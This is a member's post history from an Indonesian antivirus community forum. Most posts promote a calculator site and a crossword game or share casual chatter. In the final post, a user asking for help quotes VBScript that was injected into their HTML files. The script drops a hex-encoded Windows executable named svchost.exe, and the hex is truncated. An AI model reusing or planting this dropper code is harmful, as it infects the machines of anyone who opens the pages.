Perlihatkan Tulisan

Seksi ini mengijinkan Anda untuk melihat semua tulisan yang dibuat oleh anggota ini. Catatan bahwa Anda hanya bisa melihat tulisan yang dibuat dalam area di mana Anda memiliki akses terhadapnya.


Topik - Amri MF

Halaman: [1] 2
1
Website + SEO / Situs Untuk Mengerjakan Soal Hitungan Matematika
« pada: Pebruari 04, 2015, 05:31:54 PM »
Selamat pagi smadaver, sekedar share dan  minta pendapat dari teman-teman semua.
Awal tahun ini ane mencoba membuat situs untuk mengerjakan soal hitungan terutama matematika, fisikaa dll. Hampir mirip kalkulator, bedanya ini gunanya spesifik pada hitungan tertentu, juga disertai rumus dan  cara mengerjakan soal tersebut.

Contoh, inilah cara menghitung luas lingkaran dengan web ane


Cukup masukkan angka, maka web ane yang akan menghitung untuk kamu, dan websitenya bernama Kalkulasi.com - Kalkulator Online Multi fungsi


Harapan ane, situs ini bisa digunakan untuk mempermudah penghitungan, jadi gak perlu hafal rumus untuk mengerjakan soal matematika, karena masih baru dan masih sedikit fiturnya, ane minta masukkan dari teman2 smadaver.

Tapi biarpun masih baru, sudah ada beberapa fitur yang sudah bisa digunakan seperti:

- Hitung Luas Segitiga
- Hitung Harga Jual Produk Sebelum di Diskon
- Hitung Volume tabung
- Konversi Suhu Fahrenheit ke Kelvin

Silahkan dicoba, dan kasih masukkan buat penambahan fitur

2
Games / Game Teka teki Silang Indonesia untuk Android
« pada: April 02, 2014, 08:52:21 AM »
Sekedar share gan, ada game teka teki silang baru buatan anak Indonesia, uniknya game TTS untuk android ini update terus seperti di webnya.

IndoTTS - Teka teki Silang Android

Sebelumnya IndoTTS hadir dalam format web based, tapi di tahun 2014 ini IndoTTS juga hadir dalam versi android.

Fitur:
- Bisa dimainkan offline
- Update mengikuti web (jika terhubung ke internet)
- Teka teki silang yang unik

Penampakan


Unduh via Google Play


3
Games / Download PES 2014 dan FIFA 14 Gratis
« pada: September 15, 2013, 11:45:55 AM »
Yang suka game bola masuk, terutama yang suka Pro Evolution Soccer
Ada yang ngeshare gratis lho versi terbarunya.



Silahkan cek dimari

Download PES 14 Gratis dan Legal
Download FIFA Gratis Dari Situs Resmi EA

4
Games / Game Teka-teki silang kini hadir di Facebook
« pada: Pebruari 02, 2013, 02:06:11 PM »
Asah otak dengan menjawab kuis yang disusun menjadi pertanyaan mendatar dan menurun, itulah Teka-teki silang.
Dulu hobi ini hanya bisa dimainkan di buku TTS ataupun surat kabar seperti kompas, namun hari ini bisa dimainkan di internet, bahkan di dalam facebook.

Adalah IndoTTS, sebuah game teka-teki silang online karya anak bangsa yang mengusungnya ke Facebook. Game ini berupa game yang terintegrasi dengan web, tapi juga bisa dimainkan di dalam Facebook.


Terintegrasi dengan web
Permainan ini bisa juga dimainkan di www.indotts.com , tentunya dengan login Facebook untuk mendapatkan fitur khusus. Agar bisa memainkan teka-teki silang secara Random (memilih acak) dan kedepannya akan menggunakan score.

Dimainkan di dalam Facebook
Seperti game Facebook pada umumnya, sebut saja Texas Hold'em Poker, Angry Birds, Mafia wars dll, game IndoTTS bisa juga dimainkan di sini.

Inilah salah satu screenshot TTS onlinenya

Untuk mencobanya silahkan kunjungi game ini di AppCenter http://www.facebook.com/appcenter/indotts

5
Games / Serunya Bermain Teka-teki Silang Online
« pada: Januari 03, 2013, 08:54:01 AM »
Teka-teki silang, dulu permainan ini hanya ada di buku dan pertanyaannya susah susah, tapi sekarang sejak jaman internet,lahir situs baru yang mengubah permainan ini menjadi sebuah game TTS berbasis online.



Adalah IndoTTS, situs indonesia yang membuat teka tek silang menjadi lebih hidup, TTS di sini bukan sekedar untuk mengasah otak tapi juga untuk hiburan. Ada teka teki silang lucu, gokil dll, pertanyaan dan jawabannya yang membuat anda tersenyum atau tertawa.
Meskipun masih beta, tapi sudah ada berapa TTS yang bisa dimainkan, dalam waktu dekat, rencananya akan diintegrasikan dengan game Facebook.

Untuk memainkannya, silahkan ke tekape di http://www.indotts.com

6
Chit-Chat / Lagu Ciptaan Anak Smadaver
« pada: November 11, 2012, 08:41:05 PM »
Ternyata udah lama juga ane nongkrong dimari, dan avatar ane pegang gitar. Dan ane memang suka musik
Ini lagu ciptaan ane gan, ijin share ya.
Lagunya tentang kisah cinta di dunia maya.
Semoga menghibur, cekidot

http://www.youtube.com/watch?v=zFEqWFG_hq8

7
Saran untuk Forum / Forum sering error
« pada: Agustus 07, 2012, 05:26:27 PM »
AKihr2 ini kok forum smadav sering error ya

Pesannya seperti ini

8: Undefined offset: -3
File: /home/forumdav/smadaver.com/Sources/Load.php
Line: 1031

Kenapa tuh?

8
Sekedar berbagi gan, siapa tau ada yang pengen dengerin radio saat bermain facebook. Maaf kalo repost atau salah kamar.

Bila nonton video via Facebook tentu bukanlah hal yang aneh dan semua orang pasti sudah tahu, tapi bila mendengarkan radio via Facebook tentu saja merupakan hal yang baru bukan? Ya, benar ternyata kita juga bisa mendengarkan radio melalui Facebook, kedengarannya agak aneh memang, tapi ini bisa kita lakukan, jadi kita bisa share radio favorit kita ke teman teman melalui Facebook dan mendengarkannya bersama sama. Asik bukan..?

Apalagi sekarang hampir semua orang punya account facebook, tentu saja mendengarkan radio via facebook akan menambah mengasikkannya ketika kita bersosial media di Facebook dan caranya pun bisa dikatakan cukup mudah, semudah kita membagikan video Youtube di Facebook

Memang pada umumnya pada situs radio kita dapat mendengarkan radio secara online, namun kita tidak bisa mendengarkannya melalu situs jejaring sosial Facebook, tetapi melalui situs NusaRadio.com kita dapat mendengarkan radio melalui Facebook. Caranya pun tidak perlu aplikasi khusus, cukup kita kunjungi situs NusaRadio.com, lalu kita cari radio favorit kita (terdapat puluhan stasiun radio dari Indonesia maupun manca), lalu kita klik share on Facebook





Setelah itu, silahkan kunjungi Facebook anda, atau facebook teman anda (bila anda share ke semua  teman teman anda), silahkan tinggal klik gambar logo dari radio untuk mendengarkannya.
Share Radio via Facebook


Selamat mendengarkan radio di Facebook anda

Mudah bukan?, kita tidak akan bosan lagi ketika sedang berjejaring sosial Facebook karena bisa sekalian mendengarkan radio.

Sumber: http://aliemw.blogspot.com/2012/03/mendengarkan-radio-via-facebook.html

9
Chit-Chat / [SHARE] Cara Asik Melawan Bosan di Depan komputer
« pada: Januari 06, 2012, 07:54:04 PM »
Lama gak mampir ke forum smadav, mo berbagi cara ane melawan bosan

Para smadaver tentunya rata-rata tiap hari di depan komputer, kalo ane terus terang iya. Hal itu memang membosankan, tapi ane punya cara unik biar gak boring.
Inilah caranya, komputer / laptop ane dijadiin alat musik.
Emang bisa?
Bisa dunk, kalo gak percaya liat aja sendiri



Begitulah cara ane, memang aneh. tapi karena ane suka main musik, so komputer yang biasanya buat kerja ane sulap jadi keyboard.

Kalo yang ini malah pake keyboard komputer.


Kalo buat orang lain tentunya berbeda dunk, tapi intnya mengalihkan perhatian dari rutinitas kerja biar gak stress.

10
Konsultasi Virus / [ASK] Virus di file HTML
« pada: Maret 17, 2011, 08:49:02 AM »
Selamat pagi smadaver. komputer saya bermasalah neh, setiap saya membuat atau menyimpan file HTML pasti ada kode-kode aneh seperti ini.
Kutip
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000219891FC65F9FFAF65F9FFAF65F9FFAFA3E6A2AF67F9FFAFE246E6AF25F8FFAFDABCA0AF78F9FFAF87B0A0AF64F9FFAFA6F6A0AF47F9FFAF7EB4F0AF69F9FFAFB75BA5AF64F9FFAF5269636865F9FFAF000000000000000000000000000000000000000000000000504500004C01050000BEA23C0000000000000000E0000F010B0107040020000000C001000006000000100200001000000030000000004000001000000002000004000000050001000400000000000000002002000004000042DC0100020000800000400000800000000040000010000000000000100000000000000000000000781500006400000000D00000BC08000000000000000000000000000000000000000000000000000000000000000000000000000000000000870802008500000000000000000000000000000000000000000000000000000000100000E80000000000000000000000000000000000000000000000000000002E7465787400000000200000001000000020000000040000000000000000000000000000200000E02E64617...
Lanjutannya di attachment, coz panjang banget codenya.
Kira2 itu berbahaya gak? trus cara mengatasinya gimana?

Halaman: [1] 2